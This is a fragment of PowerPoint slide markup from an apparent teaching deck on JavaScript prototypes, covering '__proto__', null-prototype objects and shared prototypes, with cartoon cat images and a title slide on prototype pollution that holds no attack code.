            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67A19E0-EAE8-7944-152F-7F803857AB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="229925"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527737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.prototype.__proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] 3</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As the property is on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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, it does not work on objects with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> prototype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>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.create</a:t>
            </a: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).__proto__ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// `__proto__` is a property of `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` and but the prototype is `null`, so `__proto__` does not exist</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temp.__proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// same as above, as the prototype was changed from `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` to `null`</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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For the same reason, setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> on objects with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> prototype, results in an object still with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> prototype and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> property named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>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temp.__proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__ =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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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.getPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(temp)</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null</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temp</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 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'__proto__'</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 }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8494AE4-C295-BD4D-9686-AB4FED02DC64}"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEF0C28-1798-B529-3178-30EA17E4F72F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021848" y="3468674"/>
            <a:ext cx="3230423" cy="1146279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A yellow cat with black eyes and mouth&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DDF086-69E7-D60B-62B6-1DB13EF8B270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7926702" y="229925"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1720301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EE3FF0-1938-BE4B-0454-81B67F34376C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>End of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10642BB6-5084-1EEC-1DB6-97ECEB0520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descr="A yellow object with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174019A7-E309-6F11-C7BA-FCA5DAAA5DA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002579" y="-82104"/>
            <a:ext cx="3138842" cy="3138842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3973870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p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Prototype pollution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> corruption)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957803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D984993D-64F3-2579-98A1-BDC92F7DC8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(Almost) all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> are entangled.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26489098-B124-E190-FDBF-DD556B4D9A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15" name="Picture 14" descr="A yellow cat with pink hearts&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1895875A-7D8A-CC61-D77A-96362C993283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663988" y="2841050"/>
            <a:ext cx="1816023" cy="1816023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1309513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Prototypes are shared</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3F3900-263B-DABE-82C7-E6232C15F050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="597330" y="1575749"/>
            <a:ext cx="8059243" cy="3278967"/>
            <a:chOff x="597330" y="1575749"/>
            <a:chExt cx="8059243" cy="3278967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Connector: Curved 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB31D0BF-5023-8E4D-95DC-4318ACD43594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3743878" y="2141960"/>
              <a:ext cx="1734965" cy="74977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6A97910-B0D3-8324-4F62-44703852189A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437777" y="2670737"/>
              <a:ext cx="3041066" cy="22099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F57D46-5D3F-6333-F2B4-779A1BA5338C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2576635" y="2891736"/>
              <a:ext cx="2902208" cy="87099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8A24C60-C14B-9C18-B35F-DAEFF73129C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2437777" y="4409667"/>
              <a:ext cx="913771" cy="2911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73DB6A8-B84C-A941-7816-66B67F202273}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5095960" y="2891736"/>
              <a:ext cx="382883" cy="15179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D595C3D-2DDE-0115-491D-8E4A38C694D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="3"/>
              <a:endCxn id="12" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7405884" y="2854617"/>
              <a:ext cx="602045" cy="371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C985A8D-88BD-6C35-5573-3AEF3A5B0F6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5478843" y="1575749"/>
              <a:ext cx="1927041" cy="1469875"/>
              <a:chOff x="5478843" y="1575749"/>
              <a:chExt cx="1927041" cy="1469875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3733AF-D4CD-7237-2709-B340E20BFDF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5478843" y="2737847"/>
                <a:ext cx="1927041"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32" name="Picture 31" descr="A yellow cat with black lines&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33239DE-DC6E-50BD-BD6D-869A2C0F872D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5812611" y="1575749"/>
                <a:ext cx="1219200" cy="1219200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF525AE5-8EDE-870B-E3D6-BFF44C203F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7914720" y="1995994"/>
              <a:ext cx="741853" cy="1012511"/>
              <a:chOff x="7914720" y="1995994"/>
              <a:chExt cx="741853" cy="1012511"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FE83C1-5E40-1369-2E84-2048BCC19B96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8007929" y="2700728"/>
                <a:ext cx="64864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pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Picture 34" descr="A yellow cat with black eyes and mouth and nose&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B906F5DB-0647-97E8-55FF-193A716462C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7914720" y="1995994"/>
                <a:ext cx="741853" cy="741853"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F1C907-7DF9-C8E9-C978-72C9700C7034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2650332" y="1766066"/>
              <a:ext cx="1093546" cy="701216"/>
              <a:chOff x="2650332" y="1766066"/>
              <a:chExt cx="1093546" cy="701216"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BA388F-1F77-8FB4-8043-4411CDD634C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3300535" y="1988071"/>
                <a:ext cx="443343"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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Picture 37" descr="A cartoon cat pillow with a face&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C807E8E8-C27E-6312-0EDA-02B538358DF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2650332" y="1766066"/>
                <a:ext cx="701216" cy="701216"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="Group 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
